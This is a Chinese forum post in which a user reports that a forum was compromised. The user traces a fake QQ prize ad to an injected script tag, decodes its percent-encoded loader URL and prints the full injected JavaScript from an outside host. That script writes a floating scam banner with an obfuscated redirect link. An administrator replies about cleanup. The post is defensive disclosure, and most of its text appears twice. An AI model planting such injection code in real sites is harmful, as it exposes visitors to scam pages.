论坛中毒,提供一些信息,供管理员参考
早上打开一个帖子,发现有QQ中奖信息,怀疑网站被挂马 http://www.chuantu.info/tupianshangchuan/2/1311733353x-1376440113.jpg1.于是右键查看了广告图片地址是ais58点com/public/cache/backup/es.gif
2.查看了网页源代码,在头部发现可疑代码。<head> </head>之间 第17行 <script src="forumdata/cache/common点js?WHH" type="text/javascript"></script>
3.打开bbs点138点net/forumdata/cache/common点js?WHH 这个地址发被加密的地址。代码如下
document.write('<script src=h踢踢屁 : // %77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73></script>')
4.解密H踢踢屁: / / %77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73 得真实地址是www点ais58点com/public/cache/backup/ajax.js
5.浏览器打开www点ais58点com/public/cache/backup/ajax.js发现代码如下:这正是被挂马的广告代码
论坛中毒了,提供一些信息,供管理员参考。
早上打开一个帖子,发现有QQ中奖信息,怀疑网站被挂马 http://www.chuantu.info/tupianshangchuan/2/1311733353x-1376440113.jpg1.于是右键查看了广告图片地址是http://www.ais58.com/public/cache/backup/es.gif
2.查看了网页源代码,在头部发现可疑代码。<head> </head>之间 第17行 <script src="forumdata/cache/common.js?WHH" type="text/javascript"></script>
3.打开http://bbs.138.net/forumdata/cache/common.js?WHH 这个地址发被加密的地址。代码如下
document.write('<script src=http://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73></script>')
4.解密http://%77%77%77%2E%71%71%63%6F%6D%31%36%38%2E%63%6F%6D/%63%61%63%68%65/%63%73%73%2E%6A%73 得真实地址是http://www.ais58.com/public/cache/backup/ajax.js
5.浏览器打开http://www.ais58.com/public/cache/backup/ajax.js发现代码如下:这正是被挂马的广告代码
var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+6*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
var qq_etewidth = 254;
var qq_eteheight = 156;
var qq_banner_filename = "http://www.ais58.com/public/cache/backup/es.gif";
var qq_gotoUrl = "http://www.ais58.com/pic/%2570%2565%2572%2568%2561%2570%2573/%2564%2569%2573%2563%256F%2576%2565%2572/%2563%256F%256E%2573%2569%2564%2565%2572/%2570%2569%2563%2574%2575%2572%2565/can.asp";
document.write("<div id=eteUnionUpFloat style='margin:0px;padding-bottom:300px;z-index: 10;position:absolute;width:"+qq_etewidth+"px;height:"+qq_eteheight+"px;'>")
document.write("<a href='"+qq_gotoUrl+"' target='_blank'><img src='"+qq_banner_filename+"' border='0' style='cursor: hand;' width='"+qq_etewidth+"' height='"+qq_eteheight+"'></a>")
document.write("</div>")
var bodyfrm = ( document.compatMode.toLowerCase()=="css1compat" ) ? document.documentElement : document.body;
var adst = document.getElementById("eteUnionUpFloat").style;
adst.top = ( bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.clientWidth - qq_etewidth ) + "px";
function moveR() {
adst.top = ( bodyfrm.scrollTop + bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.scrollLeft + bodyfrm.clientWidth - qq_etewidth ) + "px";
}
var objTimer=setInterval("moveR();", 100);
function CloseX(){
adst.display='none';
}
function ete_closediv()
{
document.getElementById('eteUnionUpFloat').style.visibility='hidden';
if(objTimer) window.clearInterval(objTimer)
}document.writeln("<BGSOUND balance=0 src=\"http://www.ais58.com/public/cache/backup/system.wav\" volume=-240>");
} 抱歉,这几天被弄得头晕,刚刚才看到。
最后一次清理是30日凌晨 ,这次希望彻底干净了 用FF好像从没见过这些
页:
[1]